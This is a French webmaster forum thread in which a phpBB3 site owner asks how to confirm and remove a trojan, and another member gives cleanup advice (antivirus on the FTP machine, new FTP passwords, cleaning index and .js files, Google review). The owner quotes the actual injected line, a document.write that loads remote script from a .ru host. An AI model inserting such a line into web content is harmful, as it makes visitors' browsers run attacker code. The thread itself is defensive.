Infection troyen phpbb3

WRInaute occasionnel
Bonjour à tous !

Je viens de recevoir un email d'un de mes membres qui dit que mon forum phpbb3 est infecté par un troyen, savez-vous comment vérifier cette information, ensuite comment éradiquer le problème ?

d'avance merci,

Gautier
 
WRInaute accro
regarde si c'est celui qu'on connait bien ...

il pose deux ligne en bas des fichier index et des .js

Dans ce cas :

1 - vérifier anti virus sur la machine qui te sert a te connecter a ton ftp (9/10 ca passe par filezila et ses password non cryptés)
2 - Changer tes most de passe ftp pour des trucs bien compliqués
3 - nettoyer tous les fichiers concernés sur le serveur (et en local chez toi)
4 - faire une demande de réexamen du site par google pour virer l'imagette
 
WRInaute occasionnel
Zecat a dit:
regarde si c'est celui qu'on connait bien ...

il pose deux ligne en bas des fichier index et des .js

Dans ce cas :

1 - vérifier anti virus sur la machine qui te sert a te connecter a ton ftp (9/10 ca passe par filezila et ses password non cryptés)
2 - Changer tes most de passe ftp pour des trucs bien compliqués
3 - nettoyer tous les fichiers concernés sur le serveur (et en local chez toi)
4 - faire une demande de réexamen du site par google pour virer l'imagette

merci bcp pour ta réponse... Cette fameuse ligne dans les js de \styles\prosilver\template c'est bien celle-ci ?

document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Gibibyte.js"></scr'+'ipt>');

Peux-tu me dire tous les fichiers qui son infecté par cette saleté ? Je ne vois pas de quoi tu veux parler en parlant de fichiers index ? De quoi s'agit t'il ?
 
WRInaute accro
Oui c'est bien ce genhre de ligne ajoutée ..

Sur : tous les fichiers sur ton site dont le nom est index quelque chose (dans tous les repertoires) et tous les fichier dont le nom se terminent par .js
 
WRInaute occasionnel
je n'ai pas rencontré un seul index qui soit infecté ! Peux-tu me donner des exemples d'index normalement infecté ? Est-ce toujours en toute fin de code ?

est-ce qu'il faut vraiment modifier ces identifiants FTP ?


Le troyen en lui même, que fait il ?
 
Discussions similaires
Haut